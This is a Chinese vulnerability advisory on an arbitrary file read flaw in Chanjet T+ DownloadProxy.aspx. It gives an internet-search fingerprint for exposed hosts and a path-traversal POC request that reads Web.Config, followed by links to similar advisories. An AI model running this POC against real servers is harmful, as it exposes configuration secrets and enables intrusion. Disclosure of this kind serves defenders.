漏洞描述

用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件

漏洞影响

用友 畅捷通T+

网络测绘

app="畅捷通-TPlus"

漏洞复现

登录页面

验证POC

/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config

技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞相关推荐

  1. 银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞

    漏洞描述: 银达汇智 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞,通过漏洞攻击者可下载服务器中的任意文件. 漏洞利用条件: / 漏洞影响范围: 银达汇智 智慧综合管理平 ...

  2. 7天学习Go语言-尾声+一次险些翻车的任意文件读取漏洞小记

    接口 接口的定义 接口(interface )类型是对其他类型行为的概括和抽象,接口类型定义了一组方法,但是不包括这些方法的具体实现 接口本质是一种指针类型,可以实现多态功能.如果一个类型实现了某个接 ...

  3. php 打开任意文件下载,TEC-004-php文件下载任意文件读取漏洞修复

    修改download?u参数值,将/public/files/14842030529.txt,替换为../../../../../../../../../../etc/passwd function ...

  4. 安全研究 | Jenkins 任意文件读取漏洞分析

    欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...

  5. .exp文件_mini_httpd 任意文件读取漏洞(附EXP脚本)

    一.环境搭建: 进入镜像目录: cd vulhub/mini_httpd/CVE-2018-18778 启动环境: docker-compose up -d 访问8088端口 二.漏洞描述: Mini ...

  6. gitlab 更新文件_GitLab任意文件读取漏洞公告

    2020年4月28日,GitLab的一个任意文件读取漏洞的漏洞细节被公开.该漏洞补丁于2020年3月26号由GitLab官方发布.深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告. 漏洞 ...

  7. phpcms前台注入导致任意文件读取漏洞

    关于:phpcms前台注入导致任意文件读取漏洞的修复问题 简介: phpcms的/phpcms/modules/content/down.php文件中,对输入参数 $_GET['a_k']未进行严格过 ...

  8. Grafana 中存在严重的未授权任意文件读取漏洞,已遭利用

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...

  9. php mail执行命令,PHPMailer 命令执行 任意文件读取漏洞利用 【含POC】

    PHPMailer 命令执行漏洞(CVE-2016-10033) 漏洞编号:CVE-2016-10033 影响版本:PHPMailer< 5.2.18 漏洞级别: 高危 漏洞POC: PHPMa ...

最新文章

  1. CSS3动画过渡的jquery动态弹出框插件
  2. windows 7装IIS
  3. C# Application.DoEvents() 处理队列消息,防界面假死。
  4. linux 更改文件夹大小,Linux下改变文件大小
  5. c函数sscanf的高级技巧(二)
  6. 一个关于 客户端非法取消正在进行的数据提交操作 的问题 的讨论
  7. 解决 Block-scoped declarations (let, const, function, class) not yet supported outside strict mode at
  8. MAC下go语言的安装和配置
  9. FlashMX2004组件事件简单调试器
  10. 软件测试的测试方法及测试流程
  11. 关于固态硬盘开卡转接卡的研究,用SM2258XT测试智微、祥硕、威盛
  12. android 判断wifi强弱,Android:通过WifiManager监听Wifi信号强弱
  13. DoS和DDoS攻击
  14. Vue 添加组件和跳转
  15. Unity 历史版本下载
  16. C语言冒泡排序(起泡法)
  17. 程序员需要具备的五个基本条件
  18. JAVA MemCache 史无前例的详细讲解 看完包精通MEMCACHE
  19. 软件即服务(saas)_什么是SaaS? 定义软件即服务
  20. the remaind barkley posite eggplant

热门文章

  1. mac系统我的世界服务器,我的世界开服器 Mac版
  2. 「虚拟社交」爆火,资深玩家「当道」
  3. 财务报表分析实务(第六讲)
  4. Bootstrap4知识(1)
  5. 分享公司企业销售数据分析PPT模板
  6. springboot+maven/gradle整合swag及生成静态文档
  7. 人工智能又一应用场景:马云“动动嘴”买票乘地铁
  8. 向宸瀚计算机科学与技术系,优秀学生风采 | 计算机科学与技术系凌浩:从心所欲,水到渠成...
  9. GBase XDM 配置文件示例 1
  10. 移动办公平台哪家强,钉钉竞品分析报告